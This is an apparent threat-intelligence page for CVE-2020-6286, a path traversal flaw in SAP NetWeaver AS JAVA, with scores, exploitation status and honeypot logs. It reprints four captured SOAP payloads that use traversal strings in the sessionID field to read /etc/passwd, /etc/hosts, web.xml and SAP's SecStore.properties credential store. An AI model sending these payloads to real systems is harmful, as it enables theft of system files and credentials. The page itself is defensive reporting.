Medium
CVE-2020-6286
PUBLISHED
Not yet in CISA KEV
- Vendor: SAP SE
- Product: SAP NetWeaver AS JAVA (LM Configuration Wizard)
- Published: Jul 14, 2020
- EPSS: 85.7% · 99% pctl
Description
Insufficient input path validation of a certain parameter in the web service of SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40 and 7.50, allows an unauthenticated attacker to exploit a method to download zip files to a specific directory, leading to Path Traversal.
Weaknesses (CWE)
- Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSS scores
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
AV:N/AC:L/Au:N/C:P/I:N/A:N
Exploitation status
Exploited in the wild
Recorded 2026-06-12 00:32:46 UTC · KEVIntel
Proof of concept available
Recorded 2020-08-13 09:00:12 UTC · GitHub
Observed exploitation attempts
Exploitation attempts against this vulnerability observed first-hand by KEVIntel private honeypots over the last 30 days.
- Attempts observed: 4
- Unique attacker IPs: 1
- Attacker countries: 🇭🇰
- Sensors observed: 1
Exploitation attempts over the last 30 days
First observed 2026-06-12 17:20 UTC · Last observed 2026-06-12 17:20 UTC
Recent attempts
Showing observations from the last 30 days.
| Attack Time | Attacker | Sensor | Request | Confidence | Raw Event |
|---|---|---|---|---|---|
| 2026-06-12 17:20 UTC | 🇭🇰 43.198.12.3 (Hong Kong, Hong Kong), seen 4 times | 🇪🇺 SAP NetWeaver AS Java | `POST /CTCWebService/CTCWebServiceBean`; User-Agent `Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36` | High | Raw event 1 |
| 2026-06-12 17:20 UTC | 🇭🇰 43.198.12.3 (Hong Kong, Hong Kong), seen 4 times | 🇪🇺 SAP NetWeaver AS Java | `POST /CTCWebService/CTCWebServiceBean`; User-Agent `Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36` | High | Raw event 2 |
| 2026-06-12 17:20 UTC | 🇭🇰 43.198.12.3 (Hong Kong, Hong Kong), seen 4 times | 🇪🇺 SAP NetWeaver AS Java | `POST /CTCWebService/CTCWebServiceBean`; User-Agent `Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36` | High | Raw event 3 |
| 2026-06-12 17:20 UTC | 🇭🇰 43.198.12.3 (Hong Kong, Hong Kong), seen 4 times | 🇪🇺 SAP NetWeaver AS Java | `POST /CTCWebService/CTCWebServiceBean`; User-Agent `Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36` | High | Raw event 4 |

Raw event 1
- Payload fingerprint: sha256:3ef30903a9ed0f1f2a143ceb925de68c6006e7b520138463f1ea5385a3521843
- Source: KEVIntel Honeypot
- Payload:

```xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
  <soapenv:Header/>
  <soapenv:Body>
    <urn:queryProtocol>
      <sessionID>../../../../../../../../etc/hosts</sessionID>
    </urn:queryProtocol>
  </soapenv:Body>
</soapenv:Envelope>
```

Raw event 2
- Payload fingerprint: sha256:848d011004a71770cc127f5531a298206a448dfc1a877a5720b41e37d121ae9f
- Source: KEVIntel Honeypot
- Payload:

```xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
  <soapenv:Header/>
  <soapenv:Body>
    <urn:queryProtocol>
      <sessionID>../../../../../../usr/sap/NPL/SYS/global/security/data/SecStore.properties</sessionID>
    </urn:queryProtocol>
  </soapenv:Body>
</soapenv:Envelope>
```

Raw event 3
- Payload fingerprint: sha256:34e81b48a2501a9a5fef0b6141ff8ee2c4b19217d53e87a0113ab56315587718
- Source: KEVIntel Honeypot
- Payload:

```xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
  <soapenv:Header/>
  <soapenv:Body>
    <urn:queryProtocol>
      <sessionID>../../../../../WEB-INF/web.xml</sessionID>
    </urn:queryProtocol>
  </soapenv:Body>
</soapenv:Envelope>
```

Raw event 4
- Payload fingerprint: sha256:845d77c7f92038948dffa0a50891fc86dbec751805e0017190934df001c85ec3
- Source: KEVIntel Honeypot
- Payload:

```xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
  <soapenv:Header/>
  <soapenv:Body>
    <urn:queryProtocol>
      <sessionID>../../../../../../../../etc/passwd</sessionID>
    </urn:queryProtocol>
  </soapenv:Body>
</soapenv:Envelope>
```

Known exploited vulnerability sources
Catalogues that list this CVE as a known exploited vulnerability.
| Source | Added |
|---|---|
| KEVIntel First | 2026-06-12 00:32 UTC |
Potential proof of concepts
These PoCs are unverified and could contain malware. Use at your own risk.
github · Created 2020-08-13 09:00:12 UTC · 6 stars
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Directory Traversal
Timeline
- Added to KEVIntel
- Proof of Concept Exploit Available
- CVE Published to Public
- CVE ID Reserved